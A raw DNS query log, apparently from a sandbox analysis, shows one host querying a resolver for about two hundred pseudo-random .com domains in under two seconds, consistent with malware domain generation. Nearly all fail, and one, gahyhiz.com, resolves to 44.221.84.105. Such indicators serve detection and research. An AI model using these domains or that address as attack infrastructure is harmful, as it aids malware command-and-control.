Aug 23, 2024 18:47:48.785773039 CEST	1.1.1.1	192.168.2.4	0x263b	Name error (3)	lysymor.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.786164999 CEST	1.1.1.1	192.168.2.4	0x9d62	Name error (3)	galyzus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.786456108 CEST	1.1.1.1	192.168.2.4	0x7e78	Name error (3)	pumydyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.787713051 CEST	1.1.1.1	192.168.2.4	0x4894	Name error (3)	qedyqal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.787770033 CEST	1.1.1.1	192.168.2.4	0xbbb9	Name error (3)	pupymol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.789386034 CEST	1.1.1.1	192.168.2.4	0xc098	Name error (3)	vopymit.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.789463043 CEST	1.1.1.1	192.168.2.4	0xb0a7	Name error (3)	pujylyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.789473057 CEST	1.1.1.1	192.168.2.4	0xd3b3	Name error (3)	gatyniz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.789681911 CEST	1.1.1.1	192.168.2.4	0xbf95	Name error (3)	lyvysaj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.789691925 CEST	1.1.1.1	192.168.2.4	0x59f6	Name error (3)	qetynup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.790724039 CEST	1.1.1.1	192.168.2.4	0x5256	Name error (3)	vocypok.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.791198015 CEST	1.1.1.1	192.168.2.4	0x9c6f	Name error (3)	qegykeg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.791249037 CEST	1.1.1.1	192.168.2.4	0x2a9a	Name error (3)	gacypiw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.791259050 CEST	1.1.1.1	192.168.2.4	0x2ee2	Name error (3)	pufyjag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.791699886 CEST	1.1.1.1	192.168.2.4	0x64c2	Name error (3)	qegyryq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.792180061 CEST	1.1.1.1	192.168.2.4	0xe718	Name error (3)	qexytil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.793620110 CEST	1.1.1.1	192.168.2.4	0x8c9d	Name error (3)	qeqyvev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.794558048 CEST	1.1.1.1	192.168.2.4	0xdea	Name error (3)	volyrut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.794636965 CEST	1.1.1.1	192.168.2.4	0xa351	Name error (3)	gadyhoh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.794647932 CEST	1.1.1.1	192.168.2.4	0xb7dc	Name error (3)	puzytul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.794971943 CEST	1.1.1.1	192.168.2.4	0xe81d	Name error (3)	pumycav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.795157909 CEST	1.1.1.1	192.168.2.4	0xa367	Name error (3)	qedyhiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.795535088 CEST	1.1.1.1	192.168.2.4	0xf921	Name error (3)	galyryz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.796123028 CEST	1.1.1.1	192.168.2.4	0x5734	Name error (3)	vonycaf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.796648026 CEST	1.1.1.1	192.168.2.4	0xdbb9	Name error (3)	lykywex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.797811031 CEST	1.1.1.1	192.168.2.4	0x6b42	Name error (3)	pupyguq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.798136950 CEST	1.1.1.1	192.168.2.4	0xfa69	Name error (3)	lygywyj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.798738003 CEST	1.1.1.1	192.168.2.4	0xd212	Name error (3)	qekyryp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.799026012 CEST	1.1.1.1	192.168.2.4	0x2602	Name error (3)	purygiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.799813032 CEST	1.1.1.1	192.168.2.4	0x1129	Name error (3)	gaqyfub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.812611103 CEST	1.1.1.1	192.168.2.4	0x843b	Name error (3)	vonydem.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.812735081 CEST	1.1.1.1	192.168.2.4	0x48cc	Name error (3)	ganydeh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.812743902 CEST	1.1.1.1	192.168.2.4	0x521d	Name error (3)	qekyluv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.812979937 CEST	1.1.1.1	192.168.2.4	0xc6e1	Name error (3)	qebysaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.813224077 CEST	1.1.1.1	192.168.2.4	0x4128	Name error (3)	purybup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.821261883 CEST	1.1.1.1	192.168.2.4	0x505b	Name error (3)	lyrynux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.821338892 CEST	1.1.1.1	192.168.2.4	0xf044	Name error (3)	gahykeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.821518898 CEST	1.1.1.1	192.168.2.4	0xe09	Name error (3)	lygyjan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.822052956 CEST	1.1.1.1	192.168.2.4	0x91f8	Name error (3)	gaqyvys.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.825021982 CEST	1.1.1.1	192.168.2.4	0xce57	Name error (3)	vofyjom.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.825782061 CEST	1.1.1.1	192.168.2.4	0x1bab	Name error (3)	lymyved.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.826107979 CEST	1.1.1.1	192.168.2.4	0xeb8e	Name error (3)	vojykyf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.826791048 CEST	1.1.1.1	192.168.2.4	0xfaa5	Name error (3)	ganycob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.826953888 CEST	1.1.1.1	192.168.2.4	0xeeb6	Name error (3)	lysygij.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.827246904 CEST	1.1.1.1	192.168.2.4	0xe9b4	Name error (3)	vopyguk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.828258991 CEST	1.1.1.1	192.168.2.4	0x601d	Name error (3)	lyxytur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.935097933 CEST	1.1.1.1	192.168.2.4	0x5ec3	Name error (3)	puvypoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.941370010 CEST	1.1.1.1	192.168.2.4	0x947	Name error (3)	lykylud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.945147038 CEST	1.1.1.1	192.168.2.4	0xe80c	Name error (3)	vowybyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.966481924 CEST	1.1.1.1	192.168.2.4	0xcf5d	Name error (3)	qebyxog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.967197895 CEST	1.1.1.1	192.168.2.4	0x3664	Name error (3)	gatyfuw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.967540979 CEST	1.1.1.1	192.168.2.4	0x14c7	Name error (3)	pujywep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.968415022 CEST	1.1.1.1	192.168.2.4	0xa4c8	Name error (3)	lyvyxin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.971112013 CEST	1.1.1.1	192.168.2.4	0x1692	Name error (3)	puvyxig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.971466064 CEST	1.1.1.1	192.168.2.4	0x4101	Name error (3)	gahyqas.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.971609116 CEST	1.1.1.1	192.168.2.4	0x7cb2	Name error (3)	lyryfyr.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.974136114 CEST	1.1.1.1	192.168.2.4	0xabc	Name error (3)	pufymiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.974320889 CEST	1.1.1.1	192.168.2.4	0xfed2	Name error (3)	gacyzuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.974330902 CEST	1.1.1.1	192.168.2.4	0x13c8	Name error (3)	lygymod.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.974674940 CEST	1.1.1.1	192.168.2.4	0x4c68	Name error (3)	purydel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.974684954 CEST	1.1.1.1	192.168.2.4	0xd9fc	Name error (3)	gaqydaz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.974689960 CEST	1.1.1.1	192.168.2.4	0x5ac6	Name error (3)	lyxylyj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.975385904 CEST	1.1.1.1	192.168.2.4	0x7625	Name error (3)	puzylyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.975395918 CEST	1.1.1.1	192.168.2.4	0x5df7	Name error (3)	gadynub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.975667000 CEST	1.1.1.1	192.168.2.4	0x9a8c	Name error (3)	lymysox.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.978209019 CEST	1.1.1.1	192.168.2.4	0x39a2	Name error (3)	qexyluq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.978228092 CEST	1.1.1.1	192.168.2.4	0x8a7	Name error (3)	vonypic.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.978375912 CEST	1.1.1.1	192.168.2.4	0xdc63	Name error (3)	qekykal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.978384972 CEST	1.1.1.1	192.168.2.4	0x1a7d	Name error (3)	pupybyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.978394032 CEST	1.1.1.1	192.168.2.4	0x5d0d	Name error (3)	qedynug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.978403091 CEST	1.1.1.1	192.168.2.4	0xffaf	Name error (3)	volykek.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.979150057 CEST	1.1.1.1	192.168.2.4	0x43f5	Name error (3)	qebytuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.979296923 CEST	1.1.1.1	192.168.2.4	0x6f25	Name error (3)	ganypis.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.979414940 CEST	1.1.1.1	192.168.2.4	0xd937	Name error (3)	galykew.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.980005026 CEST	1.1.1.1	192.168.2.4	0xcfa2	Name error (3)	pumypop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.980015039 CEST	1.1.1.1	192.168.2.4	0x1a47	Name error (3)	lyvytud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.980024099 CEST	1.1.1.1	192.168.2.4	0x77be	Name error (3)	gatyveh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.980319023 CEST	1.1.1.1	192.168.2.4	0xb445	Name error (3)	puvytuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.980329037 CEST	1.1.1.1	192.168.2.4	0x226d	Name error (3)	pujyjol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.980583906 CEST	1.1.1.1	192.168.2.4	0x5f23	Name error (3)	vocyryf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.984714985 CEST	1.1.1.1	192.168.2.4	0x4fcb	Name error (3)	vofymif.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.984879017 CEST	1.1.1.1	192.168.2.4	0x4242	Name error (3)	qegyhip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.986079931 CEST	1.1.1.1	192.168.2.4	0x231f	Name error (3)	gacyryb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.986641884 CEST	1.1.1.1	192.168.2.4	0x2ec2	Name error (3)	lygygux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.987063885 CEST	1.1.1.1	192.168.2.4	0x79ea	Name error (3)	pufygup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.987075090 CEST	1.1.1.1	192.168.2.4	0x4771	Name error (3)	gaqycow.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.988974094 CEST	1.1.1.1	192.168.2.4	0x86f3	Name error (3)	pumyxul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.989347935 CEST	1.1.1.1	192.168.2.4	0xb413	Name error (3)	qetyfyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.989797115 CEST	1.1.1.1	192.168.2.4	0x9003	Name error (3)	lyxywen.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.989808083 CEST	1.1.1.1	192.168.2.4	0x8139	Name error (3)	lymyxir.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.990287066 CEST	1.1.1.1	192.168.2.4	0x7e8a	Name error (3)	volyqam.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.991269112 CEST	1.1.1.1	192.168.2.4	0x34a	Name error (3)	gadyfys.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.991683960 CEST	1.1.1.1	192.168.2.4	0xa2fc	Name error (3)	vojyqac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.991955042 CEST	1.1.1.1	192.168.2.4	0xbb13	Name error (3)	galyqoh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.992079020 CEST	1.1.1.1	192.168.2.4	0xdd20	Name error (3)	vowycok.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.996205091 CEST	1.1.1.1	192.168.2.4	0xee7e	Name error (3)	vocyzum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.997087955 CEST	1.1.1.1	192.168.2.4	0x2f75	Name error (3)	qegyqov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.997544050 CEST	1.1.1.1	192.168.2.4	0xf62	Name error (3)	vowydet.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.001437902 CEST	1.1.1.1	192.168.2.4	0xcaa9	Name error (3)	qeqysap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.004381895 CEST	1.1.1.1	192.168.2.4	0xa19a	Name error (3)	lykyjar.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.005526066 CEST	1.1.1.1	192.168.2.4	0x74c7	Name error (3)	lyryvaj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.007107973 CEST	1.1.1.1	192.168.2.4	0x464b	Name error (3)	vojyjot.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.009741068 CEST	1.1.1.1	192.168.2.4	0x1946	Name error (3)	vopybym.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.009752989 CEST	1.1.1.1	192.168.2.4	0x192b	Name error (3)	purycaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.009762049 CEST	1.1.1.1	192.168.2.4	0x5e11	Name error (3)	qexyreg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.014188051 CEST	1.1.1.1	192.168.2.4	0x119c	Name error (3)	qeqyxil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.014271975 CEST	1.1.1.1	192.168.2.4	0x3b9	Name error (3)	puzywag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.014281034 CEST	1.1.1.1	192.168.2.4	0x47b9	Name error (3)	qedyfyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.015703917 CEST	1.1.1.1	192.168.2.4	0xf9ef	Name error (3)	vofyguc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.018758059 CEST	1.1.1.1	192.168.2.4	0xf49f	Name error (3)	lysyfed.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.128546000 CEST	1.1.1.1	192.168.2.4	0x8287	Name error (3)	lysynun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.172827005 CEST	1.1.1.1	192.168.2.4	0x88c0	No error (0)	gahyhiz.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.427977085 CEST	1.1.1.1	192.168.2.4	0x2d9a	No error (0)	gahyhiz.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.962207079 CEST	1.1.1.1	192.168.2.4	0x3ce8	Name error (3)	vopydaf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.963650942 CEST	1.1.1.1	192.168.2.4	0x9223	Name error (3)	ganyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.963934898 CEST	1.1.1.1	192.168.2.4	0x3c91	Name error (3)	pupydev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.964302063 CEST	1.1.1.1	192.168.2.4	0x680c	Name error (3)	lyvylyx.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.964524031 CEST	1.1.1.1	192.168.2.4	0xa7c0	Name error (3)	gatydab.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.965605021 CEST	1.1.1.1	192.168.2.4	0xf3e7	Name error (3)	puvylep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.965945005 CEST	1.1.1.1	192.168.2.4	0xad57	Name error (3)	vojymuk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.966031075 CEST	1.1.1.1	192.168.2.4	0x9a7b	Name error (3)	gahynuw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.966994047 CEST	1.1.1.1	192.168.2.4	0x8534	Name error (3)	vocykec.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.967036963 CEST	1.1.1.1	192.168.2.4	0xf6d6	Name error (3)	qegynul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.967242956 CEST	1.1.1.1	192.168.2.4	0x325f	Name error (3)	vowypim.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.967545033 CEST	1.1.1.1	192.168.2.4	0xea7f	Name error (3)	gacykas.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.967555046 CEST	1.1.1.1	192.168.2.4	0x8ca2	Name error (3)	qexykav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.967885971 CEST	1.1.1.1	192.168.2.4	0x766f	Name error (3)	lyryson.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.968017101 CEST	1.1.1.1	192.168.2.4	0xec45	Name error (3)	purypig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.968610048 CEST	1.1.1.1	192.168.2.4	0x10d7	Name error (3)	lygynyr.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.968656063 CEST	1.1.1.1	192.168.2.4	0x7b2c	Name error (3)	gaqypuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.968951941 CEST	1.1.1.1	192.168.2.4	0xe8e6	Name error (3)	pufybyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.969037056 CEST	1.1.1.1	192.168.2.4	0xf1aa	Name error (3)	vofybet.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.969475031 CEST	1.1.1.1	192.168.2.4	0x2364	Name error (3)	lyxyjod.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.970674038 CEST	1.1.1.1	192.168.2.4	0x7784	Name error (3)	qeqytuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.970953941 CEST	1.1.1.1	192.168.2.4	0xbd96	Name error (3)	qedyvap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.970963955 CEST	1.1.1.1	192.168.2.4	0xf5b4	Name error (3)	lymytuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.970973015 CEST	1.1.1.1	192.168.2.4	0x77ae	Name error (3)	puzyjov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.972326040 CEST	1.1.1.1	192.168.2.4	0xcd7c	Name error (3)	vonyryk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.973105907 CEST	1.1.1.1	192.168.2.4	0x3c9d	Name error (3)	galyhib.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.973462105 CEST	1.1.1.1	192.168.2.4	0xc512	Name error (3)	lysyvax.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.975791931 CEST	1.1.1.1	192.168.2.4	0x75f2	Name error (3)	lykygun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.977725983 CEST	1.1.1.1	192.168.2.4	0x86b	Name error (3)	vopycoc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.978415012 CEST	1.1.1.1	192.168.2.4	0xc69b	Name error (3)	qebyrel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.980179071 CEST	1.1.1.1	192.168.2.4	0x832a	Name error (3)	lyvywar.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.981045008 CEST	1.1.1.1	192.168.2.4	0xbdb7	Name error (3)	gatycis.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.983022928 CEST	1.1.1.1	192.168.2.4	0x3933	Name error (3)	qekyqoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.983033895 CEST	1.1.1.1	192.168.2.4	0x8bb2	Name error (3)	vojygym.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.983875990 CEST	1.1.1.1	192.168.2.4	0xaba9	Name error (3)	puvywal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.984493971 CEST	1.1.1.1	192.168.2.4	0x7a82	Name error (3)	lykymij.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.985168934 CEST	1.1.1.1	192.168.2.4	0xe829	Name error (3)	vocyqot.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.986356974 CEST	1.1.1.1	192.168.2.4	0xa42e	Name error (3)	qexyqip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.986442089 CEST	1.1.1.1	192.168.2.4	0x11f4	Name error (3)	gacyqoz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.986931086 CEST	1.1.1.1	192.168.2.4	0xa87c	Name error (3)	pufydaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.986941099 CEST	1.1.1.1	192.168.2.4	0xb20d	Name error (3)	gaqyzyb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.986958981 CEST	1.1.1.1	192.168.2.4	0xc41	Name error (3)	lyxymix.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.987502098 CEST	1.1.1.1	192.168.2.4	0x9358	Name error (3)	puzymup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.989187956 CEST	1.1.1.1	192.168.2.4	0x5308	Name error (3)	qetyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.989846945 CEST	1.1.1.1	192.168.2.4	0x44b0	Name error (3)	lygyfej.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.990006924 CEST	1.1.1.1	192.168.2.4	0x6a62	Name error (3)	vofydak.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.990016937 CEST	1.1.1.1	192.168.2.4	0xdb39	Name error (3)	qeqylyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.991218090 CEST	1.1.1.1	192.168.2.4	0x2cc3	Name error (3)	qebylyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.991906881 CEST	1.1.1.1	192.168.2.4	0x75f7	Name error (3)	pumytyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.992774010 CEST	1.1.1.1	192.168.2.4	0xd2cf	Name error (3)	gadyvez.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.993386984 CEST	1.1.1.1	192.168.2.4	0x3e27	Name error (3)	volyjif.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.995975018 CEST	1.1.1.1	192.168.2.4	0x765d	Name error (3)	qekyhug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.998308897 CEST	1.1.1.1	192.168.2.4	0x5ee	Name error (3)	pupycop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:49.999749899 CEST	1.1.1.1	192.168.2.4	0x28de	Name error (3)	ganyrew.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.002525091 CEST	1.1.1.1	192.168.2.4	0xad6b	Name error (3)	pujygug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.003921032 CEST	1.1.1.1	192.168.2.4	0xee4f	Name error (3)	qetysog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.006565094 CEST	1.1.1.1	192.168.2.4	0xfa0a	Name error (3)	puryxuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.007973909 CEST	1.1.1.1	192.168.2.4	0xe846	Name error (3)	qegyfeq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.008632898 CEST	1.1.1.1	192.168.2.4	0x44cd	Name error (3)	vowyzuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.011265039 CEST	1.1.1.1	192.168.2.4	0xd2db	Name error (3)	gadydow.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.109510899 CEST	1.1.1.1	192.168.2.4	0x2142	Name error (3)	vonyzut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.121354103 CEST	1.1.1.1	192.168.2.4	0x7098	Name error (3)	pujymiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.139991045 CEST	1.1.1.1	192.168.2.4	0x244	Name error (3)	lyryxud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.142146111 CEST	1.1.1.1	192.168.2.4	0xd6ce	Name error (3)	gahyfyh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.161559105 CEST	1.1.1.1	192.168.2.4	0xc851	Name error (3)	volymuc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.161571026 CEST	1.1.1.1	192.168.2.4	0xb358	Name error (3)	pumyleg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.161581039 CEST	1.1.1.1	192.168.2.4	0x15ab	Name error (3)	lymylen.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.162195921 CEST	1.1.1.1	192.168.2.4	0x1505	Name error (3)	lykynyd.com	none	none	A (IP address)	IN (0x0001)	false
